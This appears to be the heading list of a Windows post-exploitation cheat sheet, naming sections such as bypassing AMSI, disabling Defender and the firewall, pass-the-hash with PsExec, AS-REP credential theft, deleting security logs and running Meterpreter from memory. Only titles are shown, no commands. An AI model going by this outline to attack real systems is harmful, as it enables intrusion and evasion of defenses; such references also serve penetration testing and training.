PreviousNix NextNetwork

Last updated 2 years ago

Windows

Versions

Files

Launcher paths

For WINDOWS NT 6.1,6.0

For WINDOWS NT 5.2, 5.1, 5.0

FOR WINDOWS 9x

for WINDOWS NT 4.0, 3.51, 3.50

System information commands

command net/domain

Remote commands

Network commands

Functional commands

MISC. commands

Locking the workstation

Disable Windows Firewall

Create port forward (*need admin access)

enable cmd

PSEXEC command

Remote file execution with specific identity information

Execution of command with special hash

Run the command on the remote system

Terminal service (RDP)

Start RDP

RDP tunnel from port 443 (need to restart the terminal service)

Remove network authentication by adding an exception in the firewall

Import task from XML file

WMIC command

WMIC [alias] [where] [clause]

Run the file in smb with specific identity information

Remove the software

Remote user access

Show processes in real time

Start RDP

The list of times that the user has entered

Search services for unquoted routes

Copy of Volume shadow

POWERSHELL environment

Bypass AMSI

Disable realtimemonitoring

List of all users

List of all domains

Get AD credentials using donotrequirepreauth

Deleting security reports and programs (for SVR01)

Extract the version of the operating system inside the CSV file

List of running services

Using ps drive for permanent sharing

Files written on 8/20

Get file from http

tcp port connections (scanner)

Ping command with 500 millisecond timeout

Basic authentication window

Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700

Run Powershell as

Upload with powershell

Email sender

Activating remote access to powershell (requires identity information)

hostname and ip list for all domains

Download from Powershell from specific path

Display Powershell data

Using powershell to run meterpreter from memory

in the attacking system

Start the listener in the attacking system

On the target system (run powershell(x86))

Encodemeterpreter.ps1 [7]

Using powershell to start meterpreter (second method)

On bt attack box

in the attacking system

Start the listener in the attacking system

In the target system (1: download the shell code, 2: execute)

Identification of vulnerable domains with powerup

Windows registry

operating system information

Product Name

Installation Date

registered name

System boot information

Time zone information (in minutes from UTC)

Map of network drivers

Mounted devices